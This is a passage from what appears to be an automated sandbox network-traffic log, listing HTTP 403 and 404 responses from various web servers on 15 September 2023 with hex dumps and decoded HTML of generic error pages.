0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:28:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nR6IMV3fuqUyvXL5Q6agF5IlCv6zl0YXmr%2B5f7HSNMbvwFRDLquDSBWje%2FdGWoZW5RWkBAUgS%2BagtnIEr5q0y7AYMVa%2BqUw%2BnlnX0LDPrqnrcTJvvuTvrKngchQ1zTds"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e765cd81c1871-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Con
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:45 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:27:46 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 5630e82f-75d3-4ea6-827b-626b1ce90244CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HC0hjSHJ6OjGxvFvbnfoSNuHaOcsPv955SxEqB2lCMY%2BxT1VwLejkjWEeefpsvwEZffUqxEU6UZIb5o9E%2F2gcxE3IEQyx42gzvRNs76Mlt%2BnjaqHij131%2BR2nhMbPUg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=75.000048Server: cloudflareCF-RAY: 806e76647aa94313-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AXPjFBfKq2f1P67XpcXI%2FaNzz7c43r9b6%2FXTpbbfqIOeqGVwgrLGDMv9XfqQ1OLAPr%2F7feN1iKf6LCWXKB7B%2Fsu5su0aKRcDtB68rm7caDhb5FR7v6xU9FX2oTBhr40%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76636d7d4385-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:47 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:49 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: ed22474b-6db2-4c61-8b50-bcbb7d1027ffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g8szos%2FqFZkJ4P5dk9pb7orlCPdKrZ3x807RIgB4tLGzTboHXwgcYEkdqX68FXeeRX4%2F40ZbAT%2B9Mhsr7GjAjuMz8Lz7OzOJ2v%2BeFVk%2F4mFVAtFI8vSPXDDX8dqwxy3Adg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=68.000078Server: cloudflareCF-RAY: 806e767bab1843c3-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XBsniC6t2CcBYM7nNwnej9%2BYOaScFMDRzm9Vwu%2BjoakOvPuqlnfFkB2j1Px35u6YjQZnQ6WFt0%2FImAJrvI3SHS5e1MCgeWozAjOP2FG9ZQwiSvRHlYFkEPstmfGIFCs3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e767e4a3d439d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:51 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=InikMg2DyloGrryMtx9ASTsu14rRd1yLb%2FXygZBm4HDowZ3bk4O0r4nNx6sDD6B5PCBVvJ4n0TR%2BYoCa8nrF00hVG38noHSm5Owd4nC9DvnAeEr9YjCo7HiD%2F5chpwUQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76808b85439d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cNIUJI424rwMBC%2F%2FkX86ydM39f%2F1aWXax5Ppk%2BQkH1jqF2p6XMdhGSty6KsVmyIHEWCZgaEJnhWn12yDToxBp01rDEFi7rj14NsFw8Y9gYtTqF31eZb5H6C0T0xe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e767f1cde41d5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
